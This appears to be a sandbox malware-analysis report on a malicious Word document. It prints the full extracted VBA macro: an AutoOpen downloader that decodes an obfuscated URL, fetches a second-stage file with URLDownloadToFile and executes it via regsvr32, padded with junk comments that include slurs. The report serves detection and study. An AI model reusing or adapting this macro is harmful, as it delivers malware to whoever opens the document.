Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d506a7e911125249…

MALICIOUS

Office (OOXML)

Size: 93.3 KB
Created: 2020-05-22 11:37:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-07-24
MD5: c20c9b35bb637f123e13d76b9856be94
SHA-1: b5d2640247e6ef9424741cf2cfd47f9b837f252a
SHA-256: d506a7e9111252495ae25542a3dcc2d0a142447e2499b191bd76098f0f32859c
Risk Score: 310

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing an obfuscated VBA macro that runs automatically through the AutoOpen sub when the document is opened. The macro calls URLDownloadToFile to download a second-stage payload (Ingress Tool Transfer) and then passes the downloaded file to regsvr32 through WshShell.Exec. Obfuscated auto-exec VBA combined with download and execution sinks strongly suggests malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    ' Sport citysearch ova ex
    C.Rv "regsvr32 " + j(1)
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 21057 bytes
SHA-256: 032aeeaa182fed19470310c1de24da7f2a2d5f0f6c466dac256e1e318308a37e
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cO"
Function ky(E)

' Celibate andalusia courtship paypal efficient
' Ind. advice omnipotent
' Ticking constituency

' Carcass swerve
' Towns spine incumbent shrew
' Fantastic baal untamed

' Dinghy turnip apache jewess
' Coax northeast algorithms ope burlesque pageant lesbian
' Diffident eau footnote
'
' Tradesman lighthouse
' Workroom crash adhere
' Ride inert nut america assumption
'
' Temperamental mj terminals
' Indicates
' Influenza stringent psychiatry begun

' Assessment frontpage medications analytical
' Pranks superlative butte
' Bakery desperado pedagogue hickory

' Trainer wav props labrador echo
' Holders mph
' Appalled containing caught monsoon
'
' Vitriol pers direction
' Creatures
' Sophisticated special
' Lithe hubbub quartermaster demands succulent
'
' Patent profaned boost
' Function death
' Vestal
'
' Democratic scum
' Shaved sprout
' Lethe commemoration gushing
' Tile airlines
' Incest xx appearing
'
' Surrey intl austria bologna disconcert buf
' Hundred receiver compaq
' Forget tho locally
' Writer roller miniature commitment proffer
' Dance

' Bowled
' Aspen enjoyable carol
' Measurement millinery
'
' Develop essay cinnamon ethiopia
' Gabriel compounds sluts comprehensible
' Echo monaco
' Thereby modulation
' Approval mater sepulchral genealogy

' Slav forced received
' Digital democrats substitute adds employer agnostic
' Trice differences attended dd
End Function
Function qb()

' Mails maize manufacturer negligible aspen
' Patter vs contamination bump
' Three engineering nutriment shameless tenet dictatorial

' Allegorical shrub babel ru
' Tournament jo. therapy
' Indirect reopen
' Favourite apostasy dyspepsia locked relating
' Ins archives
' Wildcat allen greater sweet
' Shooting cross-examination subway adam springer

' Underfoot coupling amsterdam vomit
' Celebration
' Tasty tonnage traveler impartiality
' Giants
' Ottoman

' Lips century live
' Infect nylon climate mixer precursor war dragons
' Antiquary oem dive undress edgar assimilating methodology
' Dont cell columns coasting

' Clan
' Magpie janet

' Partnerships beautifully announces swerve
' Watershed pendant donor normans

' Enquiries harass
' Transgressor
' Press epidermis kangaroo wanted newborn
' Seattle panther
' Mobile memory catacombs scandinavian comic
' Shops

' Suites hr
' Dover hopefully asset
' Sanitary

' Paste tomahawk follows plash
' Lancet chop phalanx
' Helps dating invalid advances blatant
End Function
Function j(FK)

' Dryer
' Desultory
' Dint outline fatherland athletics
Dim x1(0 To 222)
' Lawfully coupon benighted bradford
' Scenic keyboard quizzical italia
' Awe-inspiring treble causes
' Packing caring ut bradley crucifix arbitration
x1(0) = Trim("hb1tb1tb")
' Tolerance reinforcement harmony prototype ge
' Serpentine wage sixty-two forth fraternity
x1(1) = Trim("1pb1:b1/")
' Dervish whitehall ns insignia
' Initiatives
x1(2) = Trim("b1/b1wb1")
' Vixen unfold unobtrusive losses
' Marketplace schools
x1(3) = Trim("wb1wb1.b")
' Prague refurbished needing eaves astride
' Carl
' Latticed auburn retreat
' Jackson resolved expiring
' Wrangle buoyant humidity
x1(4) = Trim("1wb1ib1l")
' Animate lusitania fs
' Versification pcs reproduction depreciate omelette ebook
' Impetus horus ire worried
x1(5) = Trim("b1lb1sb1")
' Lustful craters forecast metaphor gibberish
' Amanda baltimore voluble opposed arsenal
' Statuary males
' Speaks snowball
x1(6) = Trim("tb1eb1rb")
' Geographically jagged interactive
' Immunology joyce performance harmful vicissitudes thimble
x1(7) = Trim("1nb1sb1.")
' Furthermore giant cb
' Remix pitch accept curving
' Viagra
' Measuring morris sepulchre morrison stumped azalea
' Conduit dissipation assign clocks
x1(8) = Trim("b1cb1ob1")
' Pater broach
' Transcripts jumping olfactory magnanimously fails
x1(9) = Trim("mb1/b1wb")
' Spice
' Findlaw malevolent uphold minneapolis
x1(10) = Trim("1pb1-b1c")
' Lard transmutation batch ic
' Dos circumlocution
x1(11) = Trim("b1ob1nb1")
' Valueless
' District baptize applicants pout focus
' Guild trans
' Farming independently bothered accomplishing
x1(12) = Trim("tb1eb1nb")
' Html fuji
' Moon armenia bahia trips exhibitions
x1(13) = Trim("1tb1/b1p")
' Creature canister consistence skepticism
' Thor annul torpedoes prozac
' Adhesive
' Spouting
x1(14) = Trim("b1lb1ub1")
' Bc spouse tapioca wave
' Clink snore feed
' Min admiralty
' Default purchase winder unbalanced drivers
x1(15) = Trim("gb1ib1nb")
' Operate midwinter
' Virginity cede fiasco
x1(16) = Trim("1sb1/b1s")
' Abyssinian anderson potato
' Insulin madeira maltese advertisers
' Accommodate erotic loveless
' Picked miss bard
x1(17) = Trim("b1hb1eb1")
' Reader laudable
' Pokemon monica guitar
' Behavioral bewildering
x1(18) = Trim("eb1tb1-b")
' Taylor amp gnarled selective
' Released
' Personals integer fever
' Dowager juniper befriend sedan nonsensical
x1(19) = Trim("1mb1ub1s")
' Profuse
' And lobby ed dna palanquin
' Warehouse beliefs
' Exhaust crescendo
' Beckon
x1(20) = Trim("b1ib1cb1")
' Braxton merit accosted grounds
' Improvident hostel stratified
' Isle canberra
' Windfall session
' Outreach da pulley fingering
' Hurtful girls bayonet nearby
x1(21) = Trim("-b1lb1ib")
' Dysentery theoretic warner
' Allocation dole connection muhammad luis
' Filter assessment pours paperback house
x1(22) = Trim("1bb1rb1a")
' Sacrifice ninety-nine minneapolis fraction gig milkman settee
' Somerset completing premises
' Technician lot muffler markers gran sonnet
' Tress clocks
' Combo retrace
x1(23) = Trim("b1rb1yb1")
' Youthfulness disapproval vacations paraphrase
' Samoa vhs sulkily larch comeliness
' Inconsolable coding declared testimonials
' Forward fossil
' Behind archives christina ottawa outpost
x1(24) = Trim("/b1_b11b")
' Creation
' Collar talent appertain adsl
' Waxing ste. decease calcareous billow
' Cat milkman
x1(25) = Trim("1Ob14b1p")
' Wheedle herb pertain debt sambo
' Axiom continued brutish wizened excel billet
' Punjab himalayas myself geology simon
x1(26) = Trim("b1Ub1mb1")
' Cox precipitately acetylene gratuitous hustle
x1(27) = Trim("Zb10b1Rb")
' Hartford stones
' Epson
' Burrow antediluvian acknowledgement fiddling
x1(28) = Trim("13b1xb1K")
' Franchise lender tottering ascendancy
' Jobs wayward discard
' Lead diagonal silurian undergraduate
' Deuteronomy mug carbide
' Differently hear
' Navigate organizing oracular
' Loops prove martial
x1(29) = Trim("b1hb1kb1")
' Logo pictures
' Defend blackguard pebble retracted
x1(30) = Trim("Lb1fb1.b")
' Credible cuba tandem
' Cinnamon
' Shop
' End eocene administrators
' Plaintiff unrequited dike honduras
x1(31) = Trim("1pb1hb1p")
' Richardson journals with recurrence
x1(32) = Trim("b1?b1xb1")
' Select minds arthritis coalition ace german
' Braggart karl silicon accredited radios zigzag
' William celt
' Iceland
' Pessimistic
x1(33) = Trim("=b1Mb1Db")
' Regenerate nether seen
' Hiring commitments consequence
x1(34) = Trim("1Ab1wb1M")
' Southeast skills submissive collection respiratory
x1(35) = Trim("b1Cb1Db1")
' Moon prevention grades gabble
' Away punic eileen peppermint
x1(36) = Trim("kb1Ub1Ub")
' Containing
' Russet cord sister
' Proffer happiness fundamentally preferences
' Conservative froward stench
' Watch colder gasoline
x1(37) = Trim("1Hb1Nb14")
' Drinking buildings adult delectation
' Thanksgiving security botanist effrontery
' Elapse rear rider unpropitious xl
' Graph division gad treat
' Aberdeen tar contract michigan privacy depth
' Opening graduation effectively
x1(38) = Trim("b1-b1jb1")
' Civilian yn partook
' Anymore calvinist guide
x1(39) = Trim("Cb1eb1pb")
' Youngster brocade
' Wanna belated quantities match redound entirety
' Conversion hertfordshire
' Scaly crony measurements
' Sat barriers generally diana pledge
x1(40) = Trim("1lb15b1I")
' Sedentary tv concierge riding
' Badge earnings fatalism
' Goals gates butchers ports oscillation
' Purplish flirt assistant imagine rp
x1(41) = Trim("b1Ab1fb1")
' Hawthorn
x1(42) = Trim("yb1ib1Ob")
' Year microwave polish
' Ordination dale duchy thrive
' Machinery harpoon
' Underhand fondle
x1(43) = Trim("1gb1Hb12")
' Bret intercept experimenting offensive
' Bang height leading beatles calcium mislead boating
' Whose remedies back
' Intuitive avoidance translation
x1(44) = Trim("b1Wb1db1")
' Dido
x1(45) = Trim("zb1sb1Rb")
' Kingston excess byte relevant
' Capture
' Thirty-seven carry
x1(46) = Trim("17b1Jb1r")
' Stilts intentional comparative survival
x1(47) = Trim("b1Qb1kb1")
' Supplemental beta probe impersonal
' Incident sculpture follow selective shave
' Optional
x1(48) = Trim("Pb1Lb1Yb")
' Puerto dam permissions conclude cockney touchstone
x1(49) = Trim("1zb1jb1v")
' Anyone fleece abstemious loves
' Assure shingle fly
' Malachi wrestle
' Passer tuner
' Feed shrimp
x1(50) = Trim("b1Fb1ub1")
' Marketplace liked entities buying
' Bellow laymen wuss beginners
' Rig wort thereby preventing emancipate resort
' Abounded answering they departmental declared bedraggled
' Toner encyclopedia
' Propagating shield lesbians celebrate wold
x1(51) = Trim("Pb1ib1zb")
' Cia
' Browse mon irremediable
' Clown outspoken tools
' Places
' Abaft ferry
x1(52) = Trim("1cb1Ub16")
' Provincial mashed powder
' Pole bmw census boxing
' Blacken multimedia genuine scaly dat
x1(53) = Trim("b1yb1tb1")
' Cylindrical creates merger smoldering
' Menus
' Point scowl measured urban figured harmed christine
' Broods stanley
x1(54) = Trim("lb1gb1ib")
' Vertex coordinated vulnerability grenadier
x1(55) = Trim("1vb1Xb1W")
' Subjects turpentine a- workforce
' Peterborough
' Volleyball bearable matrix cave smock
' Wasp burglary dido woolly jesse
' Xerxes viands bacterial temperature
' Impropriety scrip generator tamper thereunto helter-skelter
x1(56) = Trim("b1Zb15b1")
' Recipient canal gel
' Snore received roguish
' Bicycle porter auctioneer
' Street sis realm
' Rampart pass jubilant niggers
' Shack steadfastness decadence
x1(57) = Trim("Tb1rb1rb")
' Leaven convocation strengths
x1(58) = Trim("16b1Lb1A")
' Supreme inconsiderate unopened disorderly sappho
' Array kangaroo
x1(59) = Trim("b14b13b1")
' Odium
' Dearth design
x1(60) = Trim("Nb13b1Lb")
' Hose
' Lothario housing flaccid lip loading capabilities
' Corp visible tulip indiscreet brent
' Hospitals evident accepts sleeping
' Encumbrance lather absolve
' Shorn rely
x1(61) = Trim("1Rb1eb1w")
' Bank js requesting
' Can tucson
' Targets unlettered faqs proficient
' Depreciate magnitude absolutism
x1(62) = Trim("b11b1ib1")
' Distillation coffee garlic labour starring
' Cartoons aria quince optimize cooked
' Driver furthermore
x1(63) = Trim("6b1eb1bb")
' Representatives producers norm colder
' Duo permission sydney ancient
' Proceedings deficit teresa
x1(64) = Trim("1mb10b1t")
' Malevolent mischance far-fetched baseness
' Sluggard non pomegranate
' Minus
' Soul
' Intertwined cadet pliable livesex
' Disillusion mote endearment
x1(65) = Trim("b10b1Zb1")
' Rolf
' Accumulating taylor fallacious plain
' Asked tatiana lewd happiness avow calabash
x1(66) = Trim("Hb1vb1Ob")
' Knead cosmetic heifer
' Nickname imposes varied emporium
' Esplanade tunisia quietude unyielding warrior
' Johnny crown functionality rhea sean notebook
' Thankless imposed depot
x1(67) = Trim("1Ub1cb1M")
' Asthma ordering mammon sixty-three
' Uninformed solutions timorous
x1(68) = Trim("b1yb1lb1")
' To fy unofficial worm
' Conviction scabbard sam itinerant
' Recorder
x1(69) = Trim("Mb1wb19b")
' Carrying pinnacle georgie utilize remained
' Currency uninterested
' Keenness
x1(70) = Trim("1Ib1Nb1D")
' Repartee key
' Cargo
' Marketing transportation
x1(71) = Trim("b1ab1yb1")
' Renunciation beside ruff river
' Luck
' Identification tennis oc programmers
x1(72) = Trim("Lb1ab17b")
' Seafood checked
' Spice plume hammer
' Sod procedures sacred
' Taxation yard standings abolitionist
x1(73) = Trim("1lb1Eb1T")
' Beaches regular sniff
' Cluster handbags things optic calvin
' Gg interrogatory rouge
' Tsp erotica intel
' Humans dimensional languish
' Valuable transsexual sticky wheres totally
x1(74) = Trim("b1yb10b1")
' Emission prig mink
' Millions conservation
' Disaffected slovenia modified mesopotamia vault
' Madder mauve carrying orlando focus
' Awesome cheats
x1(75) = Trim("6b1-b10b")
' Funding epidermis distance hoar budget zdnet yukon
' Happens exist runaway candlestick costs
' Humans wholl wall
' Grocer palanquin subsequent inquiries
x1(76) = Trim("16b1_b1f")
' Kathy
' Restitution mph
' Ave reprimand lire
x1(77) = Trim("b1pb1jb1")
' Counts breeding son rail derek
' Periodic comparable copenhagen
' Cranium
x1(78) = Trim("ib1Ob1Ab")
' Dis assassinate kuwait
' Knife handle rebate trigger
' Hc shale incorporate patch
' Imperial search
x1(79) = Trim("1wb1Gb1B")
' Hermitage exchange
' Sleeps solaris ply overcrowded
' Harmonic stone vex immaculate
x1(80) = Trim("b1Zb1gb1")
' Sea bring armenian tattoo dear
' Notice javascript flying vernon sorcery
' Supervisor rates
' Harmful instigator saves hike
x1(81) = Trim("3b12b1ib")
' Awarded variable ibrahim
' Tb
' Cortege gross
' Epithet hitting incorporate underworld
' Crape nimble barrow posting divergent
' Kissing copyright seafood
' Ps. immobile plaintiff propitious
x1(82) = Trim("1vb1ib1d")
' Aerial hives
' Broil punctilious flurry
' Permanent station
' Enigmatical hitachi trance
x1(83) = Trim("b1rb1Sb1")
' Forgery meaning distortion cruises waitress inscrutable
' Tripod camp adder mercurial butchers enrollment
' Practices in- coiled
x1(84) = Trim("Wb1Cb1Zb")
' Hiring consortium tenderfoot poll
' Digit incisive bestowal our
' Mischance wmo perspective
x1(85) = Trim("16b15b1e")
' Resists
' Britannica
' Estonia proffer median
' Examinations
x1(86) = Trim("b17b1Wb1")
' Commented oil diplomat uplift
x1(87) = Trim("kb1ib1Yb")
' Electorate methodical boobs exalts mls
' Labor bishop tunis jessica page
' Brabant marl
x1(88) = Trim("1ab1Ab1w")
' Rx phrygian objects hyundai
' Lecturer abolish con decade latitude
' Raised recycling hussy
x1(89) = Trim("b1Wb18b1")
' Assume prettier invocation passenger belts penis colombo
' Babylonian milfhunter consensus spreading
' Sepulchral ace avaricious aflame
' Harvard uncertainty suns coined
' Refutation moi
' Pedestal thousandth fool
x1(90) = Trim("ob1xb14b")
' Mechanisms
' Relay revision repentant remnants carefully presentations fm
' Basement plentifully loft
' Controlling
x1(91) = Trim("1vb13b1u")
' Copying condition digit
x1(92) = Trim("b1Rb1Tb1")
' Fewest vt oughtnt
x1(93) = Trim("7b1Yb1tb")
' Ostracism suzerainty anomaly affluent apartments cones
' Arrive
' Wallow oe languages iron
' Expiration modifies nec
' Understood
x1(94) = Trim("1vb1Kb1Q")
' Unripe march
' Temperamental arid undergraduate
' Incompatible leslie abelard
' Dazzle mats incoherent concubine
' Urgency ashley
x1(95) = Trim("b1jb13b1")
' Dance subdivision mx erik pure colossus
' Compatible hoot evaporate hire
' Pest ahmed
x1(96) = Trim("-b1Gb1Nb")
' Disaffected telecommunications disaster hood consultants
' Examiner qualification cinders symbols recommends abdul slammed
' Cnn italia
' Bestsellers left
x1(97) = Trim("1hb13b1q")
' Disabled diluted
' Developmental ochre lineage
' Lambda jocund apes requested casey
' Scales mecca chemical
x1(98) = Trim("b1bb1Mb1")
' Rear-guard southampton
' Nurture
' Diffusion parsley franc
' Sexually scheduled tissue method
' Splitting tongs reindeer skins
' Bentley none
' South seaweed sort wuss
x1(99) = Trim("~b1%b1%b")
' Pup abraham exhibit titten
' Brandishing michelle coleman
x1(100) = Trim("1%b1cb1:")
' Swivel sponsor mid quito canal
' Flagon suburban geologist infrastructure habitat sullied
' Tomorrow moth legislator
' Migration amicably hyacinth
' Shackles indonesia centered
x1(101) = Trim("b1\b1pb1")
' Rocket zenith conservative
x1(102) = Trim("rb1ob1gb")
' Only publication decrease notre
' Shaw broad ceres
' Mixed friesland swing friend drivers
x1(103) = Trim("1rb1ab1m")
' Stories kine loki carbine
' Continually
' Infinite dealt modicum saliva
x1(104) = Trim("b1db1ab1")
' Overdue
' Gram mountain catering
' Peak km
' Expired academical tigers
' Manner discrepancy
' Relation storey alt watson fairly
' Mentor
x1(105) = Trim("tb1ab1\b")
' Infest indicator pedestrian cams
' Dangerous humidity
' Capitol demented double three-quarter
' Alias portland detestation dresser
x1(106) = Trim("13b16b15")
' Harmonize ladies rental preferences cable harboured logistics
' Mortgage
' Thrown gig teresa
' Epa uzbekistan
' Dropped silhouette
' Strand personal wy
' Coy montana
x1(107) = Trim("b18b16b1")
' Lumpy arrived
' Compute infirm mc wasteful arian
' Sleigh
x1(108) = Trim("9b11b15b")
' Storm trieste lettuce knoll cocoa
' Navajo garage delays
' Announce workshop les arbiter
x1(109) = Trim("1.b1db1a")
' Vibrate wallet siren ka attractions
' Processors claret
' Saturn portfolio
x1(110) = Trim("b1tb1")

' Temporary outdoors define arcade
' Precipitous seeker item almanac casino
' Minion hs
Vc = Join(x1, "")

' Tapioca holdings butch healer
' Comp
' Perpetrator reception
' Parking dalliance burthen
Vc = Replace(Vc, "b1", "")

' Spike evil simpsons compares
' Tripe numeric emphasis enamoured
' Exceptionally
' Jr vedic watt
sT = Split(Vc, "%%%")

' Constitutes embedded
' Self-made pickpocket difficulty kids
' Discounted crescent winner
' Asylum fictitious major-domo monroe curvature
Select Case FK
Case 0
j = sT(0)
Case 1
j = sT(1)
Case Else
Debug.Print "Vc"
End Select
End Function
Sub AutoOpen()

' Rigor cord educator
' Pb trevor attempted falstaff
' Comma
Dim ya As New k7

' Hunt michelle operates epson extraordinary
' Variations scotia logic supernumerary bra
' Replacing burke
' Towns fiddler sensitive
' Seems qualm demented rehearse waters faggot
ya.O j(0), j(1)

' Facilitate meekness
' Convulsive shed solo daze
' Auditory lapel beats recurrence endangered witnesses
' Internship twiki
Dim C As New PZ

' Receipt bleached
' Nam addicted departmental payroll

' Items brewery
' Evening portico amend
' Zone orgy
' Une deadening mass product long
' Perfume

' Cincinnati

' Xi clearance rotund vic
' Exploitation sitting city abby inquire
' Sport citysearch ova ex
C.Rv "regsvr32 " + j(1)
End Sub

Attribute VB_Name = "k7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()

' Probability quiescent racks employer
' Taper slander providers flaw
' Law-abiding producers cu
' Premium stamps submitted
' Elapse wally nebraska nicaragua
End Sub
Private Sub Class_Terminate()

' Designated liechtenstein newsletters
' Experiences porpoise supervise
End Sub
Public Function O(T, L6)

' Framing append grove tyrannical exportation
' Amanda
' Dandy generally frozen connecticut
' Cruising gourd
w = URLDownloadToFile(0&, T, L6, 0&, 0&)
End Function

Attribute VB_Name = "PZ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Rv(q)

' Cd
' Situations breton hand
Dim UA As New WshShell
UA.exec q
End Function
Function F(tm)
    
' Double-barrelled free childhood rob
' Brands archipelago talkative
' Bedtime
' Venice capacious diploma
' Prefatory

' Constitutional bean
' Eyes
' Twine slanderous th forceps guy anglo-indian
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 64512 bytes
SHA-256: fc3fe10c06692727ed449ad72bdcd2c62375de11a3ade973607ca0a153ae7b1e
Detection
ClamAV: Doc.Malware.Generic-7898874-0
Obfuscation or payload: unlikely